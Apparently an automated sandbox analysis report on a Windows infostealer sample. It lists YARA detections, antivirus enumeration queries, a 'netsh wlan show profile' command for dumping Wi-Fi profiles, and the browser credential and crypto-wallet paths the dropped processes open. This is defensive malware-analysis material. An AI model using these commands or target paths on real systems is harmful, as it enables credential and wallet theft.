                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeQueries volume information: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\ProgramData\KMSAuto\accc.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jqnnpe.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1962FC GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,0_2_00007FF68A1962FC
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3C6DC0 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,??3@YAXPEAX@Z,2_2_0F3C6DC0
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3C6DC0 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,??3@YAXPEAX@Z,2_2_0F3C6DC0
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: Yara matchFile source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: 19.0.5E16.tmp.aaa.exe.620000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 5E16.tmp.aaa.exe PID: 7640, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, type: DROPPED
                      Source: C:\Windows\System32\relog.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                      Source: 5E16.tmp.aaa.exe, 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, 5E16.tmp.aaa.exe.2.drBinary or memory string: MSASCui.exe
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3223679486.000000000535A000.00000004.00000020.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2822722381.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2979244152.00000000077EA000.00000004.00000020.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2937106455.0000000006672000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: 5E16.tmp.aaa.exe, 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, 5E16.tmp.aaa.exe.2.drBinary or memory string: procexp.exe
                      Source: 5E16.tmp.aaa.exe, 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, 5E16.tmp.aaa.exe.2.drBinary or memory string: MsMpEng.exe
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: 24.2.svchost.exe.6d60000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3950838.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3950838.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.6c60000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.6c60000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.6d60000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3174046241.0000000003807000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3217843417.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.0000000003146000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 20.0.62AB.tmp.build.exe.a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000014.00000000.1945315404.0000000000A72000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 62AB.tmp.build.exe PID: 7672, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe, type: DROPPED
                      Source: Yara matchFile source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED
                      Source: Yara matchFile source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED
                      Source: Yara matchFile source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
                      Source: Yara matchFile source: 24.2.svchost.exe.6c60000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.6c60000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Electrum
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: JaxxDir
                      Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                      Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                      Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ExodusDir
                      Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q%appdata%`,^qdC:\Users\user\AppData\Roaming`,^qdC:\Users\user\AppData\Roaming\Binance
                      Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Ethereum
                      Source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2A
                      Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                      Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Windows\System32\relog.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
